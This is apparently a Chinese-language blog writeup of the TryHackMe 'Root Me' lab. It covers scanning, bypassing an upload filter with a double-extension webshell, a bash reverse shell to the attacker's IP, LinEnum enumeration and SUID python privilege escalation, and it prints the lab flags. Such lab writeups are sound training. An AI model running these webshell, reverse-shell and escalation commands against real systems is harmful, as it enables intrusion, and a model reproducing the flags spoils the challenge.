Root Me (Try Hack Me Writeup)


題目網址 : https://tryhackme.com/room/rrootme

目標IP : 10.10.233.205

Scanning

  • 起手式 nmap
    • nmap -A 10.10.233.205
      • 22 : SSH
        • 7.6p1 有枚舉的漏洞 CVE-2018-15473
        • https://github.com/sriramoffcl/OpenSSH-7.6p1-Exploit-py-/blob/master/45233.py
      • 80 : Apache
        • Apache httpd 2.4.29
  • nmap 掃描的同一時間,先打開網頁看看
    • 網頁起手式 dirsearch
      • python3 dirsearch.py -u http://10.10.233.205/ -e all
      • 看起來可能會有趣的路徑
        • /panel/
        • /uploads/

上傳 webshell

  • /panel/ 可以上傳檔案
    • 用 Wappalyzer 可以確定他是 PHP
  • 上傳個 b374k.php
    • 會噴錯,Google翻譯說 PHP是不允許的! (葡萄牙文)
  • 使用 php 副檔名解析漏洞測試
    • Apache 1.x 2.x 文件解析特性
      • BJ4
    • 測試檔名 b374k.php.aaa
        • Google 翻譯 :文件上傳成功!

使用 Webshell

  • 點下面的 Veja! 會跳轉到 http://10.10.233.205/uploads/b374k.php.aaa
    • 使用預設密碼就能進入 shell

戳入 Reverse Shell

  • Webshell 滿好用的,但是Reverse shell用起來更爽
    • 確認攻擊機 ip 為 10.14.7.198
      • 終端機輸入 nc -vlk 7877
    • webshell 的 Terminal 輸入
      • bash -c 'bash -i >& /dev/tcp/10.14.7.198/7877 0>&1'
    • 即可順利連上 Reverse shell
    • 輸入指令讓他變得更 interactive 一點
      • python -c 'import pty; pty.spawn("/bin/bash")'

在電腦裡面逛大街

  • user.txt
    • THM{y0u_g0t_a_sh3ll

設法提權

  • 使用內建的上傳功能上傳 LinEnum.sh
    • 開權限 chmod +x LinEnum.sh
    • 執行,並存到檔案 ./LinEnum.sh | tee meow.txt
    • 基本上優先注意紅色、橘色的東西
  • 找到有趣ㄉ東西!! [+] Possibly interesting SUID files: -rwsr-sr-x 1 root root 3665768 Aug 4 2020 /usr/bin/python
    • 也就是說 /usr/bin/python 可以用 SUID 執行
    • GTFOBins 找 Python 有 SUID 的提權方法
      • python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

提權成功!!

  • Flag : THM{pr1v1l3g3_3sc4l4t10n}
,

發表迴響